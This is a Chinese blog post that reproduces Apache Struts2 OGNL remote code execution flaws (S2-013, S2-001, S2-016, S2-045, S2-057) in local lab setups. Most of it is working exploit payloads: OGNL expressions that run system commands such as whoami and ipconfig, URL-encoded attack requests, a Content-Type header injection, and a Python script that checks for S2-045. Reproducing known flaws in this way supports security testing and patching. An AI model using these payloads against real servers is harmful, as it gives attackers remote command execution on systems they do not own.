Struts框架漏洞

最新推荐文章于 2024-04-18 11:01:30 发布
最新推荐文章于 2024-04-18 11:01:30 发布
阅读量1.2k 收藏
点赞数
分类专栏: 框架漏洞 文章标签: java 框架漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48985780/article/details/119781302
版权

Struts框架漏洞

Struts-S2-013漏洞利用

不妨先来看下index.jsp中标签是怎么设置的

<p><s:a id="link1" action="link" includeParams="all">"s:a" tag</s:a></p>
<p><s:url id="link2" action="link" includeParams="all">"s:url" tag</s:url></p>

然后来测试一下最简单payload ${1+1}(记得编码提交 :)

http://localhost:8888/link.action?a=%24%7B1%2b1%7D

就可以看到返回的url中的参数已经被解析成了2

 查询whoami

${(#_memberAccess["allowStaticMethodAccess"]=true,#a=@java.lang.Runtime@getRuntime().exec('whoami').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[50000],#c.read(#d),#out=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#out.println(#d),#out.close())}

更改网址后的

%24%7B(%23_memberAccess.allowStaticMethodAccess=true,%23context["xwork.MethodAccessor.denyMethodExecution"]=false,%23cmd="ipconfig",%23ret=@java.lang.Runtime@getRuntime().exec(%23cmd),%23data=new+java.io.DataInputStream(%23ret.getInputStream()),%23res=new+byte[500],%23data.readFully(%23res),%23echo=new+java.lang.String(%23res),%23out=@org.apache.struts2.ServletActionContext@getResponse(),%23out.getWriter().println(%23echo))%7D

Struts-S2-001漏洞利用

五、 POC:

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cmd.exe", "/c", "whoami"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

六、 测试网址:

将POC粘到一个输入框,点击Submit,此后会将数据提交到后端,后端检测值是否为空,然后返回,满足漏洞前提
执行结果:

执行ipconfig命令时还是出现只能输出第一行,老问题,因为写的时候没有安装漏洞的顺序写,解决方法在后面有提及,简单来说就是修改e大小,重复#d.read(#e), #f.getWriter().println(new java.lang.String(#e))

七、 修改后POC

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cmd.exe", "/c", "ipconfig"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)), #d.read(#e),#f.getWriter().println(new java.lang.String(#e)),#d.read(#e),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

八、执行结果

Struts-S2-016漏洞利用

poc:

?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cmd.exe', '/c','whoami'}})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

原始网址:

http://127.0.0.1:8080/struts2-showcase-2.1.6/showcase.action

修改之后网址:

http://127.0.0.1:8080/struts2-showcase-2.1.6/showcase.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cmd.exe', '/c','whoami'}})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

七、执行结果

执行结果,有下载文件,下载并用notepad++打开看到结果



 

Struts-S2-045漏洞利用 

poc:

Content-Type:"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

用docker搭建好环境后,访问,是这个界面

随便选择个文件,上传,用burp抓包

然后Repeater,只需要更改Content-Type的值,就可实现远程代码执行

附上一个检测POC

#!/usr/bin/env python
#coding:utf8
#code by fuck@0day5.com
import sys
import requests
requests.packages.urllib3.disable_warnings()
 
def poccheck(url):
    result = False
    header = {
        'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
        'Content-Type':"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#o=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#o.println(88888888-23333+1222)).(#o.close())}"
    }
    try:
        response = requests.post(url,data='',headers=header,verify=False,allow_redirects = False)
        if response.content.find("88866777")!=-1:
            result = url+" find struts2-45"
    except Exception as e:
        print str(e)
        pass
    return result
 
if __name__ == '__main__':
    if len(sys.argv) == 2:
        print poccheck(sys.argv[1])
        sys.exit(0)
    else:
        print ("usage: %s http://www.baidu.com/vuln.action" % sys.argv[0])
        sys.exit(-1)

Struts-S2-057漏洞利用

在url处输入http://IP:8080/struts2-showcase/${(123+123)}/actionChain1.action后刷新可以看到中间数字位置相加了。

 

修改中间${(123+123)}位置的payload替换用代码执行编写成命令执行的exp,这一步使用burp抓包修改可以直观的看到结果

Payload: //注:payload需要使用url编码

 抓包发送到Repeater(重放)模块,在url加上url编码的paylaod,然后发送即可在头部看到回显结果

 

 

 

xzhome
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
360众测靶场题库之20-Apache Struts2远程代码执行漏洞(S2-013)
zjl12344的博客
03-07 170
360众测靶场题库
墨者学院-Apache Struts2远程代码执行漏洞(S2-013)复现
JimWu的博客
09-04 1849
Apache Struts2远程代码执行漏洞(S2-013)复现 难易程度:★ 题目类型:命令执行 使用工具:FireFox浏览器、burpsuite 漏洞原理: s:url和s:a标记都提供includeparams属性。该属性的主要作用域是了解包含或不包含http://request参数的内容。INCLUDEParams的允许值为:none-在URL中不包含任何参数(默认),get-仅在URL...
Struts2框架漏洞总结与复现(下)
剁椒鱼头没剁椒的博客
02-08 1763
Apache Struts 1插件的Apache Struts 2.3.x 版本中存在远程代码执行漏洞,该漏洞出现于Struts2的某个类中,该类是为了将Struts1中的Action包装成为Struts2中的Action,以保证Struts2中的Struts1插件启用的情况下,远程攻击者可通过使用恶意字段值,构造特定的输入,发送到ActionMessage类中,从而导致任意命令执行,进而获取目标主机系统权限。在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵。
Struts2反序列化漏洞复现_strust2反序列化 修复,2024年最新网络安全开发还不会这些
最新发布
2301_78146994的博客
04-18 468
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
浅谈struts2漏洞(检测工具及S2-052漏洞漏洞平台的搭建复现)
Ping_Pig的博客
09-28 4977
简介: struts2是apache项目下的一个web框架,主要应用于各类门户网站,而相对应的漏洞则是从2007年7月23日发布的第一个Struts2漏洞S2-001到2018年的S2-057,跨度还是很多的,以前学习的时候也是听说,基本上Struts每发布一个版本都会存在漏洞,根据Freebuf上的文章显示,漏洞的类型基本上是RCE,XSS,CSRF,DOS,目录遍历和其他功能缺陷漏洞等。风靡...
Struts2最全面的远程命令执行漏洞梳理
LuoOpening的博客
03-29 831
OGNL的全称是对象图导航语言( Object-Graph Navigation Language),它是一种用于获取和设置 Java对象属性的开源表达式语言,以及其他附加功能,是Struts2的默认表达式语言。使用这种表达式语言,可以利用表达式语法树规则,存储Java对象的任意属性,调用Java对象的方法,同时能够自动实现期望的类型转换。OGNL最初是作为一种使用属性名称在UI组件和控制器之间建立关联的方法。
struts1漏洞总结及整改方案
08-07
因为最近攻防演练,对公司的资产进行梳理,发现部分应用还使用的struts1框架,所以赶快收集整理了相关的漏洞以及相关的整改方案。提供给大家。
Struts2漏洞检查工具2018版.rar
03-31
标题中的"Struts2漏洞检查工具2018版.rar"指的是一个专门针对Struts2框架的2018年发布的漏洞检测工具。这个工具可能包含了针对那时已知的Struts2安全问题的扫描功能,帮助系统管理员和开发者识别并修复潜在的安全...
Struts2漏洞检查工具Struts2.2019.V2.3
01-25
"Struts2漏洞检查工具Struts2.2019.V2.3"是一个专门针对这些漏洞进行检测的工具,旨在帮助开发者和网络安全专业人员识别并修复Struts2框架中的安全问题。 Struts2的安全漏洞主要包括以下几类: 1. OGNL(Object-...
struts2 漏洞利用工具.rar
06-15
本压缩包"struts2 漏洞利用工具.rar"显然是为了帮助安全研究人员或系统管理员识别和测试Struts2框架中的漏洞。 在Struts2的生命周期中,一个关键的漏洞是CVE-2017-5638,通常被称为S2-045或"Struts Shatter"漏洞。...
Struts2 漏洞分析及如何提前预防
09-02
这个漏洞发生在Struts2框架的动态方法调用功能中,允许攻击者通过精心构造的请求执行任意系统命令。 漏洞的原理在于Struts2的OGNL(Object-Graph Navigation Language)表达式语言的滥用。OGNL是一种强大的表达式...
struts2漏洞修复
01-29
漏洞影响范围(Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10),漏洞危害程度严重,可造成直接获取应用系统所在服务器的控制权限 文件包含ognl-3.0.21.jar,struts2-convention-plugin-2.3.34.jar,struts2-core-2.3.34.jar,struts2-spring-plugin-2.3.34.jar,xwork-core-2.3.34.jar
Struts2远程代码执行漏洞(CVE-2020-17530) 复现及排查
dayouzi的博客
08-15 1194
Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。CVE-2020-17530是对CVE-2019-0230的绕过,Struts2官方对CVE-2019-0230的修复方式是加强OGNL表达式沙盒,而CVE-2020-17530绕过了该沙盒。在特定的环境下,远程攻击者通过构造恶意的OGNL表达式,可造成任意代码执行。
struts2漏洞原理及解决办法
weixin_34092455的博客
03-27 713
Struts2被曝存在重大远程任意代码执行安全漏洞,影响Struts2全系版本。而对于此次堪比棱镜事件的危害,安全宝指出,众多大型互联网厂商均存在该漏洞,且影响厂商仍在扩大之中。同时漏洞利用代码已经被强化,可直接通过浏览器的提交对服务器进行任意操作并获取敏感内容。目前安全宝用户暂可高枕无忧。同时也建议使用Struts开源架构的网站用户尽快加入安全宝云体系,以保护网站免受漏洞的威胁。  据悉,Str...
web渗透测试基础入门
03-30
专注培养高薪网络安全人才,帮助大家了解并学习网络安全,传授黑白帽实战技能,带领零基础小白正式踏入入门阶段。一个有实战经验的老师,带你一步一步从基础入门,让你清晰的了解渗透测试的过程和方法,讲解各方面的知识点和经验。
CVE-2020-0014 Toast组件点击事件截获漏洞
道阻且长,行则将至。
01-07 1218
漏洞可使恶意 App 通过构造一个可被点击的 Toast 视图来截获用户在屏幕上的操作,以达到搜集用户密码等敏感信息的目的。
vulhub复现之struts漏洞复现
m0_70483044的博客
10-06 447
Struts2就是一个框架,它是属于web层的一个框架,是Struts1的一个升级版,但是它和Struts1来相比,提供了太多的增强和改进,怎么运行的呢,就是实现了Servlet的功能,来进行控制页面跳转。同时这也是基于MVC设计模式的Web应用框架Struts2的控制功能就相当于MVC中的Controller的功能,用来控制页面的转向。​。
jQuery框架漏洞全总结及开发建议
热门推荐
iokla
10-02 1万+
一、jQuery简介 jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库。jQuery设计的目的是为了写更少的代码,做更多的事情。它封装JavaScript常用的功能代码,提供一种简便的JavaScript设计模式,优化HTML文档操作、事件处理、动画设计和Ajax交互。 据一项调查报告,在对433,000个网站的分析中发现,77%的网站至少使用了一个具有已知安全漏洞的前端JavaScript库,而jQuery位列榜首,而且远远超过其他库。但事实上这些库有可用的不
最新!Apache Struts 又爆安全漏洞(危害程度特别大)
Java技术栈,分享最主流的Java技术
08-16 1593
Struts 是一个开源的 Java Web MVC 框架,也是 Apache 软件基金会的一个开源项目,包括 Struts 1 和 Struts 2,Struts 1 早已被淘汰,现在市面上说的 Struts 主要是指 Struts 2。 很不幸,现在 Struts 2 也是被淘汰的框架了,但也有很多老项目也还是在用 Struts 2 的,所有还在用的小伙伴们需要关注一下。 具体就不多说了,可以看栈长之前分享的:Struts2 为什么被淘汰? 漏洞说明 攻击者可以利用文件上传漏洞,覆盖访问权限,以造成服务
struts2漏洞原理
07-27
\[3\] 为了防止这个漏洞的攻击,建议开发者及时升级Struts 2框架到最新版本,并采取其他类似的Java开发框架来替代。\[2\] #### 引用[.reference_title] - *1* [渗透知识-Struts2漏洞]...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值